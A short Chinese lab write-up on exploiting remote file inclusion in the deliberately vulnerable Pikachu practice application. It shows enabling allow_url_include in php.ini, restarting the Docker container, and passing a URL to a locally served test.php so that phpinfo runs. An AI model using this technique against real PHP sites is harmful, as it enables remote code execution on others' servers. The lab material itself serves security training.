Pikachu-File Inclusion-远程文件包含

 远程文件包含漏洞

        是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的，因此漏洞一旦存在，危害性会很大。但远程文件包含漏洞的利用条件较为苛刻；因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。

PHP的需要php.ini中配置

allow_url_fopen=On    // 默认情况下是打开的；
allow_url_include=On  // 默认情况下是关闭的；

开启配置

文件所在位置：

	/etc/php/7.3/apache2/php.ini

修改完成后，

重启容器， 

exit         #退出当前容器的/bin/bash
docker ps    #查找当前容器id
docker restart 4e4ccb0e81d2   #重启pikachu容器

再次访问，没有了告警；

首先，在D盘下构造一个 test.php 文件 ,

python 搭一个本地文件服务器

 再次请求远程文件包含， filename 的值改为http://192.168.3.218:8000:test.php   

可以看到，phpinfo 已经显示；